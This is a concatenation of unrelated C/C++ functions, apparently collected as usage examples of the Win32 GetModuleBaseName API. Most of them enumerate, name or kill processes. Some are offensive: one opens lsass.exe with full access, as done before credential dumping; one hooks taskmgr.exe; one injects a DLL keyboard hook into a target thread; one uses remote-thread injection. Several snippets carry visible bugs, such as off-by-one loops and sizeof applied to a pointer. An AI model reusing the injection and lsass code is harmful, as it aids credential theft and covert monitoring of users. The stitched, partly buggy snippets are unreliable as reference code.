HMODULE ChildProcessManager::GetChildProcessMainModule() const { HMODULE ret(NULL); if (IsChildProcessCreated()) { HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, m_piProcInfo->dwProcessId ); if (hProcess != INVALID_HANDLE_VALUE) { char lpBaseName[MAX_PATH]; CProcessModuleIterator pmi(m_piProcInfo->dwProcessId); for (HMODULE hModule = pmi.First(); hModule; hModule = pmi.Next()) { if (GetModuleBaseName(hProcess, hModule, lpBaseName, MAX_PATH)) { std::string moduleName(lpBaseName); if (moduleName.find(".exe") != std::string::npos) { ret = hModule; break; } } } CloseHandle(hProcess); } } return ret; }
ULONG GetProcessID(LPCSTR TargetProcessName) { DWORD nSize = MAX_PATH; HANDLE hCurrentProcess; CHAR BaseName[MAX_PATH]; DWORD aProcesses[1024], cbNeeded; unsigned int i; if (!EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded)) return FALSE; // NumberProcesses = nSize = cbNeeded / sizeof(DWORD); for (i = 0; i <= nSize; i++) { if(NULL != (hCurrentProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, aProcesses[i]))) { GetModuleBaseName(hCurrentProcess, NULL, BaseName, sizeof(BaseName)); if(0 == stricmp(BaseName, TargetProcessName)) { CloseHandle(hCurrentProcess); return aProcesses[i]; } } CloseHandle(hCurrentProcess); } return FALSE; }
DWORD getModuleBase(const std::string& sModuleName, HANDLE hProc) { HMODULE *hModules = nullptr; char buffer[64]; DWORD modules_size; DWORD result = -1; if (!EnumProcessModules(hProc, hModules, 0, &modules_size)) { std::cout << "Error: EnumProcessModules failed: " << GetLastError() << std::endl; return 0; } hModules = new HMODULE[modules_size / sizeof(HMODULE)]; if (EnumProcessModules(hProc, hModules, modules_size / sizeof(HMODULE), &modules_size)) { for (unsigned int i = 0; i < modules_size / sizeof(HMODULE); i++) { if (GetModuleBaseName(hProc, hModules[i], buffer, sizeof(buffer))) { if (strcmp(sModuleName.c_str(), buffer) == 0) { result = (DWORD)hModules[i]; break; } } } } delete[] hModules; return result; }
void PrintProcessNameAndID( DWORD processID ) { char szProcessName[MAX_PATH] = "unknown"; // Get a handle to the process. HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID ); // Get the process name. if (NULL != hProcess ) { HMODULE hMod; DWORD cbNeeded; if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) ) { GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName) ); } else return; } else return; // Print the process name and identifier. printf( "%s (Process ID: %u)\n", szProcessName, processID ); CloseHandle( hProcess ); }
void printProcessInfo(DWORD processID) { TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>"); // Get a handle to the process. HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID ); // Get the process name. if (NULL != hProcess) { HMODULE hMod; // An array that receives the list of module handles. DWORD cbNeeded; //The number of bytes required to store all module handles in the Module array if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) { GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName)/sizeof(TCHAR)); } } // Print the process name and identifier of matching strings, ignoring case _tprintf(TEXT("%s (PID: %u)\n"), szProcessName, processID); // Release the handle to the process. CloseHandle( hProcess ); }
int GetProcessId(const char* file_name) { const int maximum_processes = 1024; LPDWORD process_ids; LPTSTR base_name; HANDLE process; DWORD i, processes, process_id = 0; process_ids = (LPDWORD)HeapAlloc(GetProcessHeap(), 0, maximum_processes * sizeof(DWORD)); if(process_ids != NULL) { if(EnumProcesses(process_ids, maximum_processes * sizeof(DWORD), &processes)) { base_name = (LPTSTR)HeapAlloc(GetProcessHeap(), 0, MAX_PATH * sizeof(TCHAR)); if(base_name != NULL) { processes = processes / sizeof(DWORD); for(i = 0; i < processes; i++) { process = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, process_ids[i]); if(process != NULL) { if(GetModuleBaseName(process, NULL, base_name, MAX_PATH) > 0) { if(!lstrcmpi(base_name, file_name)) { process_id = process_ids[i]; CloseHandle(process); break; } } CloseHandle(process); } } HeapFree(GetProcessHeap(), 0, (LPVOID)base_name); } } HeapFree(GetProcessHeap(), 0, (LPVOID)process_ids); } return process_id; }
void startDaemonScan() { PVOID buffer = VirtualAlloc(NULL, 1024 * 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); while (1) { DWORD procIDsBuffer[MAX_PROCESSES]; DWORD size_returned; EnumProcesses(procIDsBuffer, sizeof(procIDsBuffer), &size_returned); int numProc = size_returned / sizeof(DWORD); int i; TCHAR strBuffer[MAX_PATH]; for (i = 0; i < numProc; i++) { DWORD curr_pid = (int)procIDsBuffer[i]; HANDLE Handle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, TRUE, curr_pid); GetModuleBaseName(Handle, NULL, strBuffer, MAX_PATH); if ((Handle) && isInFrobProcList(strBuffer)) reactToProcess(curr_pid, strBuffer); CloseHandle(Handle); } updateList(); } }
void kill_process(string name) { #ifdef _WIN32 CHAR szProcBuff[101]; DWORD pIDs[300], dwBytesReturned; HANDLE hProcess; INT i, procCount; EnumProcesses(pIDs, sizeof(pIDs), &dwBytesReturned); procCount = dwBytesReturned / sizeof(DWORD); for (i = 0; i < procCount; i++) if (pIDs[i] != 0) { hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_TERMINATE, 0, pIDs[i]); GetModuleBaseName(hProcess, 0, szProcBuff, 100); if (strcmp(szProcBuff, name.c_str()) == 0) TerminateProcess(hProcess, EXIT_SUCCESS); CloseHandle(hProcess); } #elif __APPLE__ string command = "killall -kill " + name; system(command.c_str()); #endif while (process_running(name.c_str()) > 0) Sleep(1); }
bool MatcProcessImageName(DWORD dwProcId,const TCHAR* tcImageName, bool bTestRunning=false) { if(NULL == tcImageName) return false; HANDLE hProc = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcId ); bool bHasName= false; bool bResult = false; TCHAR tcModuleName[MAX_PATH]; if (NULL != hProc ) { if(bTestRunning) { DWORD ExitCode = 0; if(GetExitCodeProcess(hProc, &ExitCode)) { if (STILL_ACTIVE != ExitCode) return false; } else { if(WAIT_TIMEOUT != WaitForSingleObject(hProc, 0)) return false; } } HMODULE hMod; DWORD nRetCountMod = 0; if(EnumProcessModules(hProc, &hMod, sizeof(hMod), &nRetCountMod)){ bHasName = (0 != GetModuleBaseName( hProc, hMod, tcModuleName, sizeof(tcModuleName)/sizeof(TCHAR) ) ); } else { bHasName = (0 != GetProcessImageFileName(hProc, tcModuleName, sizeof(tcModuleName)/sizeof(TCHAR)) ) ; } } if(bHasName) { const TCHAR *pExeName = _tcsrchr(tcModuleName, TEXT('\\')); pExeName = (pExeName) ? ++pExeName : tcModuleName; bResult = (0 == StrCmpI(pExeName,tcImageName)); } CloseHandle(hProc); return bResult; }
bool CallStack::loadAllModules() { #ifdef WIN32 DWORD dwNeeded = 0; if (!EnumProcessModules(hProcess, hModule, sizeof(hModule), &dwNeeded)) return false; const int iCount = dwNeeded / sizeof(HMODULE); for (int i = 0; i < iCount; ++i) { MODULEINFO info; GetModuleInformation(hProcess, hModule[i], &info, sizeof(info)); GetModuleFileNameEx(hProcess, hModule[i], szImageName, iMax); GetModuleBaseName(hProcess, hModule[i], szModuleName, iMax); #ifdef X64 SymLoadModule64(hProcess, hModule[i], szImageName, szModuleName, (DWORD64)info.lpBaseOfDll, info.SizeOfImage); #else SymLoadModule(hProcess, hModule[i], szImageName, szModuleName, (DWORD)info.lpBaseOfDll, info.SizeOfImage); #endif } #endif return true; }
NSHARE::CText process_name(int processID) { TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>"); // Get a handle to the process. HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID); // Get the process name. if (INVALID_HANDLE_VALUE != hProcess) { HMODULE hMod; DWORD cbNeeded; //Given a handle to a process, this returns all the modules running within the process. //The first module is the executable running the process, //and subsequent handles describe DLLs loaded into the process. if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) { //This function returns the short name for a module, //typically the file name portion of the EXE or DLL GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)); } } NSHARE::CText _text(szProcessName); //close the process handle CloseHandle(hProcess); return _text; }
void PrintProcessNameAndID( DWORD processID ) { TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>"); TCHAR szFilename[MAX_PATH] = TEXT("<unknown>"); HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID); if (hProcess != NULL) { HMODULE hModule; DWORD cbNeeded; if ( EnumProcessModules( hProcess, &hModule, sizeof(hModule), &cbNeeded) ) { GetModuleBaseName( hProcess, hModule, szProcessName, sizeof(szProcessName)/sizeof(TCHAR) ); GetModuleFileNameEx( hProcess, hModule, szFilename, sizeof(szFilename)/sizeof(TCHAR) ); } CloseHandle( hProcess ); } _tprintf( TEXT(" %16s %-60s (PID: %u)\n"), szProcessName, szFilename, processID ); }
BOOL CSelectProcessDlg::OnInitDialog(void) { CDialog::OnInitDialog(); // initialization DWORD cbNeeded; EnumProcesses(procs, sizeof(procs), &cbNeeded); numprocs = cbNeeded / sizeof(DWORD); HANDLE hProcess; HMODULE hMod; wchar_t str[255]; for (int i = 0; i < numprocs; i++) { hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, procs[i]); if (hProcess) { if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) { GetModuleBaseName(hProcess, hMod, str, 255); m_cmbProcesses.AddString(str); m_cmbProcesses.SetItemDataPtr(m_cmbProcesses.GetCount() - 1, (void*)&procs[i]); } CloseHandle(hProcess); } } return TRUE; }
void ProcessFinder::PrintProcessNameAndID( DWORD processID ) { TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>"); // Get a handle to the process. HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID ); // Get the process name. if (NULL != hProcess ) { HMODULE hMod; DWORD cbNeeded; if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) ) { GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName)/sizeof(TCHAR) ); } } // Print the process name and identifier. std::map<std::string,int>::iterator it = processes.find(szProcessName); if(it!=processes.end()) { (*it).second++; } else { std::pair<std::string,int> elem; elem.first = szProcessName; elem.second = 1; processes.insert(elem); } CloseHandle( hProcess ); }
std::wstring GetDestinationFileName() { std::wstring baseName; //get from file name of this executable { std::wstring moduleBaseName = GetModuleBaseName(); std::wstring moduleBaseNameLower = moduleBaseName; for(int n = 0; n < (int)moduleBaseNameLower.length(); n++) moduleBaseNameLower[n] = tolower(moduleBaseNameLower[n]); int index = (int)moduleBaseNameLower.find(_T("_mono")); if(index == -1) { MessageBox(0, _T("Invalid executable file name.\n\nDemands file name in format \"{destination base file name}_mono[any characters].exe\"."), _T("Mono launcher error"), MB_OK | MB_ICONEXCLAMATION); return _T(""); } baseName = moduleBaseName.substr(0, index); } return baseName + _T(".exe"); //return GetModuleFullDirectory() + _T("\\") + baseName + _T(".exe"); }
// Determine le nombre de processus du nom de "monProcess" en cours d'éxécution int test_exist_process(const char* monProcess) { int nombreTrouves = 0; DWORD processes[MAX_TAB], nb_processes; char process_name[MAX_TAB]; int i; HANDLE hprocess; EnumProcesses(processes, sizeof(processes), &nb_processes); //On teste tous les processus pour voir si leur nom correspond for(i = 0 ; i < nb_processes / sizeof(DWORD) ; i++) { hprocess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processes[i]); //Prend le nom du processus et le met dans process_name GetModuleBaseName(hprocess, NULL, process_name, sizeof(process_name)); CloseHandle(hprocess); if(strcmp(process_name, monProcess) == 0) { nombreTrouves++; } } return nombreTrouves; }
bool IsExeRunning(char* pName) { unsigned long aProcesses[1024], cbNeeded, cProcesses; if(!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded)) return false; unsigned long curPID = GetCurrentProcessId(); cProcesses = cbNeeded / sizeof(unsigned long); for (unsigned int i = 0; i < cProcesses; i++) { if(aProcesses[i] == 0) continue; if (aProcesses[i] == curPID) continue; HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, aProcesses[i]); if (!hProcess) continue; char buffer[50] = {0}; GetModuleBaseName(hProcess, 0, buffer, 50); CloseHandle(hProcess); if(strcmp(pName, buffer)==0) return true; } return false; }
bool ScanModules (DWORD processID) { HMODULE hMods[1024]; HANDLE hProcess; DWORD cbNeeded; // Get a list of all the modules in this process. hProcess=OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID ); if (NULL==hProcess) return 0; if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)) { for (unsigned int i=0; i<cbNeeded/sizeof(HMODULE) && i<1024; i++) { TCHAR szModName[MAX_PATH]; if (GetModuleBaseName( hProcess, hMods[i], szModName, sizeof(szModName)/sizeof(TCHAR) )) { if (0==_wcsicmp(szModName, _T("npswf32.dll")) || 0==_wcsicmp(szModName, _T("flash9c.ocx")) ) { CloseHandle(hProcess); return 1; } } } } CloseHandle(hProcess); return 0; }
BOOL GetModules(HANDLE hProcess, char* Strings) { DWORD processid[1024], needed, processcount, modulecount; HMODULE hModule[1024]; DWORD cb = 0; BOOL ret = 1; char path[MAX_PATH] = "", temp[MAX_PATH], basename[MAX_PATH]; EnumProcesses(processid, sizeof(processid), &needed); processcount = 1;// needed/sizeof(DWORD); for (DWORD i = 0; i< processcount; i++) // 列举一下explorer下的模块 { if (hProcess) { EnumProcessModules(hProcess, hModule, sizeof(hModule), &needed); modulecount = needed / sizeof(DWORD); //_itoa(processid[i], temp, 10); for (DWORD j = 0; j < modulecount; j++) { GetModuleFileNameEx(hProcess, hModule[j], path, sizeof(path)); GetModuleBaseName(hProcess, hModule[j], basename, sizeof(basename)); GetShortPathName(path, path, 256); if(!strcmp(basename, Strings)) { ret = 1; } printf("%s\t\t%s\n", basename, path); } } } return ret; }
//lookup process name of process with processID //compare to processName int Application_InternetExplorer::compareName(DWORD processID, std::wstring processName) { TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>"); // Get a handle to the process. HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID ); // Get the process name. if (NULL != hProcess ) { HMODULE hMod; DWORD cbNeeded; if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) ) { GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName)/sizeof(TCHAR) ); } CloseHandle( hProcess ); } //_tprintf( TEXT("%s (PID: %u)\n"), szProcessName, processID ); int comparison; comparison = wcsicmp(szProcessName, processName.c_str()); return comparison; }
VOID printProcessName(DWORD processID) { TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>"); // Get a handle to the process. HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID ); // Get the process name. if (NULL != hProcess ) { HMODULE hMod; DWORD cbNeeded; if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) ) { GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName)/sizeof(TCHAR) ); } } // Print the process name and identifier. _tprintf( TEXT("%s (PID: %u)\n"), szProcessName, (UINT)processID ); CloseHandle( hProcess ); }
/* retrieve a handle to lsass.exe */ HANDLE GetLsassHandle() { DWORD dwProcessList[1024]; DWORD dwProcessListSize; HANDLE hProcess; char szProcessName[10]; DWORD dwCount; /* enumerate all pids on the system */ if (EnumProcesses(dwProcessList, sizeof(dwProcessList), &dwProcessListSize)) { /* only look in the first 256 process ids for lsass.exe */ if (dwProcessListSize > sizeof(dwProcessList)) dwProcessListSize = sizeof(dwProcessList); /* iterate through all pids, retrieve the executable name, and match to lsass.exe */ for (dwCount = 0; dwCount < dwProcessListSize; dwCount++) { if (hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessList[dwCount])) { if (GetModuleBaseName(hProcess, NULL, szProcessName, sizeof(szProcessName))) { if (strcmp(szProcessName, "lsass.exe") == 0) { return hProcess; } } CloseHandle(hProcess); } } } return 0; }
BOOL CSysinfo::GetProcessName (pid_t pid, char *dest, int sz) { // this code is deprecated. It was causing ACCESS_VIOLATIONS // on Windows XP. #if 0 DWORD *block; Refresh(); block = FindBlock (pid); if (!block) { dest[0] = '\0'; return FALSE; } MakeAnsiString ((WORD*)(*(block+15)), dest); #endif HANDLE Hnd; if( ! (Hnd = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid))) { return FALSE; } if ( ! GetModuleBaseName(Hnd, NULL, dest, sz) ) { return FALSE; } return TRUE; }
//Get the processID wanted DWORD GetProcessIdByName(DWORD processId, TCHAR* sProcessNameWanted) { TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>"); //require information type, ?, processid HANDLE hProcess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processId ); DWORD baseAddr=0; MODULEINFO miModInfo = { 0 }; if(NULL!=hProcess) { HMODULE hMod; DWORD cbReturned; if(EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbReturned)) { GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName)/sizeof(TCHAR)); } if(_tcscmp(szProcessName,sProcessNameWanted) == 0) { GetModuleInformation(hProcess,hMod, &miModInfo, sizeof(miModInfo)); //_tprintf( TEXT("%s (PID: %u) baseAddr: 0x%X\n"), szProcessName, processId,miModInfo.lpBaseOfDll); CloseHandle(hProcess); return processId; } CloseHandle(hProcess); return 0; } return 0; }
void GetProcessName(pid_t pid, char *ProcessName) { HANDLE hProcess; strcpy(ProcessName, "unknown"); #if HAVE_WIN32_PSAPI /* Get a handle to the process. */ hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid); /* Get the process name. */ if (NULL != hProcess) { HMODULE hMod; DWORD cbNeeded; if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) GetModuleBaseName(hProcess, hMod, ProcessName, sizeof(ProcessName)); else { CloseHandle(hProcess); return; } } else return; CloseHandle(hProcess); #endif }
void *CHook::Run() { char *szProcName="taskmgr.exe"; HANDLE hProcess; DWORD aProcesses[1024], cbNeeded, cProcesses; while(true) { unsigned int i; char szProcessName[MAX_PATH]; HMODULE hMod; if(!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded)) return false; cProcesses=cbNeeded/sizeof(DWORD); for(i=0; i<cProcesses; i++) { strcpy(szProcessName, "unknown"); hProcess=OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, aProcesses[i]); if(hProcess) { if(EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) { GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName)); if(!stricmp(szProcessName, szProcName)) { Hook(hProcess); Sleep(60000); } } CloseHandle(hProcess); } } Sleep(250); } return NULL; }
void CTKLauncherDlg::KillProcess(const char* process) { DWORD ids[1000]; HMODULE modules[1000]; DWORD count; EnumProcesses(ids,sizeof(DWORD)*1000,&count); count/=(sizeof(DWORD)); HANDLE handle; for(int i=0;i<(int)count;i++) { //for each of the processes DWORD nmod; handle=OpenProcess(PROCESS_ALL_ACCESS,FALSE,(DWORD)ids[i]); EnumProcessModules(handle,modules,sizeof(HMODULE)*1000,&nmod); nmod/=(sizeof(HMODULE)); if(nmod>0) { char name[100]; GetModuleBaseName(handle,modules[0],name,99); if(stricmp(process,name)==0) { TerminateProcess(handle,1); CloseHandle(handle); break; } } CloseHandle(handle); } }
/* This method performs the actual injection. It gets an appropriate thread id, loads the dll, gets the address of the inject method, then calls SetWindowsHookEx. */ int processInject(int pid) { DWORD processID = (DWORD)pid; TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>"); HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID); if (NULL != hProcess) { HMODULE hMod; DWORD cbNeeded; if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) ) { GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName)/sizeof(TCHAR) ); } } _tprintf( TEXT("Injecting into process %s PID: %u\n"), szProcessName, processID); DWORD threadID = getThreadID(processID); printf( "Using Thread ID %u\n", threadID); if(threadID == (DWORD)0) { puts("Cannot find thread"); return -1; } HMODULE dll = LoadLibrary("inject.dll"); if(dll == NULL) { puts("Cannot find DLL"); return -1; } HOOKPROC addr = (HOOKPROC)GetProcAddress(dll, "Test"); if(addr == NULL) { puts("Cannot find the function"); return -1; } //Uses the threadID from getThreadID to inject into specific process //HHOOK handle = SetWindowsHookEx(WH_MOUSE, addr, dll, threadID); HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, addr, dll, threadID); if(handle == NULL) { puts("Couldn't hook the keyboard"); } getchar(); getchar(); getchar(); UnhookWindowsHookEx(handle); return 0; }
BOOL stopProgram(const TCHAR *name) { char szProcessName[MAX_PATH] = "unknown"; // Get the list of process identifiers. DWORD aProcesses[1024], cbNeeded, cProcesses; unsigned int i = 0; if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) ) return FALSE; // Calculate how many process identifiers were returned. cProcesses = cbNeeded / sizeof(DWORD); // Print the name and process identifier for each process. for ( i = 0; i < cProcesses; i++ ) { if( aProcesses[i] != 0 ) { // HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_TERMINATE, FALSE, aProcesses[i]); // if ( NULL != hProcess ) { HMODULE hMod; DWORD cbNeeded; if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) { GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName)); } else { continue; } } else { continue; } if (lstrcmpi(name, szProcessName) == 0) { ::TerminateProcess(hProcess,0); } else { ::CloseHandle(hProcess); } } } return FALSE; }
void CProcessWatchThread::UnLoadLibrary() { DWORD aProcessIds[2048] = {0}; DWORD dwProcessCount = 0; DWORD hDll = 0, dwWritten = 0; LPVOID lpFun = NULL; LPVOID lpBuf = NULL; HANDLE tThread = NULL; DWORD dwSize = lstrlen(strDLL) * sizeof(TCHAR) + sizeof(TCHAR); if (EnumProcesses(aProcessIds, 2048, &dwProcessCount)) { for (DWORD i = 0; i < dwProcessCount; ++i) { HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | SYNCHRONIZE, FALSE, aProcessIds[i]); if (hProcess) { TCHAR cExeName[MAX_PATH] = {0}; if (GetModuleBaseName(hProcess, NULL, cExeName, MAX_PATH)) if (_tcsicmp(cExeName, strEXE) == 0) { do { lpBuf = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(hProcess, lpBuf, (LPVOID)strDLL.GetBuffer(strDLL.GetLength()), dwSize, &dwWritten); if( sizeof(TCHAR) == 2 ) lpFun = GetProcAddress( GetModuleHandle(_T("kernel32.dll")), "GetModuleHandleW" ); else lpFun = GetProcAddress( GetModuleHandle(_T("kernel32.dll")), "GetModuleHandleA" ); tThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpFun, lpBuf, 0, 0); if (tThread) { WaitForSingleObject(tThread, INFINITE); GetExitCodeThread(tThread, &hDll); VirtualFreeEx(hProcess, lpBuf, dwSize, MEM_DECOMMIT); CloseHandle(tThread); if( ! hDll ) { CloseHandle(hProcess); return; } lpFun = GetProcAddress( GetModuleHandle(_T("kernel32.dll")), "FreeLibraryAndExitThread" ); if (lpFun) { tThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpFun, (LPVOID)hDll, 0, NULL); if (tThread) { WaitForSingleObject(tThread, INFINITE); CloseHandle(tThread); } } } } while(hDll); } CloseHandle(hProcess); } } } }